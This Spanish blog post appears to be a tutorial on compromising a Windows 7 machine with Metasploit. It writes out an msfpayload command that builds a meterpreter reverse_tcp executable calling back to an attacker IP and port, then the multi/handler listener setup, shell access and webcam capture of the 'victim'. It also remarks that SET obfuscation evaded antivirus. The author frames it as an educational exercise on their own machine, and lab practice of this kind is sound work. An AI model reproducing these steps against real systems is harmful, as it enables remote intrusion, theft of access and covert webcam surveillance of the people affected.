Ya estoy empezando a hacer prácticas más avanzadas, así que en este
post voy vamos a utilizar metasploit para tener acceso a una máquina con
Windows 7. Generaremos un archivo que se tendrá que ejecutar en la
máquina víctima.
Esta manera es la que yo he encontrado más fácil, después de ver algunos videos que hay por la red (sobretodo en otros idiomas).
Lo primero es ejecutar metasploit.
En un terminal ejecutamos “msfconsole”.
Una vez que se carga, tecleamos “show exploits” donde nos muestra los
exploits que se encuentran. Una vez que localizamos el que nos
interesa ( WINDOWS/SMB/MS08_067_NETAPI), copiamos la ruta y, en el
terminal ponemos lo siguiente:
En este punto, tecleamos “show payloads” para ver los payloads”.
Una vez localizado el que buscamos ( Windows/meterpreter/reverse_tcp), abrimos otro terminal y ponemos lo siguiente:
“Msfpayload Windows/meterpreter/reverse_tcp LHOST=192.168.1.39 LPORT=4444 x > /usr/prueba.exe”
donde una que vez termine, nos vamos a la carpeta usr y encontraremos el archivo ‘prueba.exe”.
Cogemos este archivo y hay que conseguir que lo ejecuten en la
máquina víctima (en este caso, es un entorno de Red), que lo conseguí
porque la máquina es mia. J
Una vez que está en la victima el archivo, nos vamos a la terminal
donde usamos el exploit y ejecutamos “use multi/handler” para permanecer
a la escucha.
Definimos la IP del atacante con “set LHOST ipatacante” y “set LPORT puerto”.
Ponemos “exploit” y se ejecuta. Se queda a la “escucha”, esperando
que el payload se ejecute en la máquina victima y se conecte.
Una vez que lo ejecutan, nos aparece en el terminal esto:
Ponemos “Shell” y ya estamos en el prompt del ordenador infectado.
Lo que me llamó la atención fue el acceder a la webcam de la victima.
Para ello, ponemos “exit” para volver al prompt de “meterpreter” y
ponemos “webcam_list” para acceder a la webcam disponibles en el equipo.
Posteriormente, ponemos “webcam_snap” y nos realizará una captura de la webcam en ese momento.
Y la captura…..
Eso es todo amigos…..un saludo…y recordad que esto es con fines
educativos….hacedlo en un entorno controlado. Yo quite el AV para evitar
pasos, pero en la prueba que hice usando SET en el que ofuscaba no me
lo detectaba.
Gracias por su post amigo
David
@darksh4m4n
No hay comentarios:
Publicar un comentario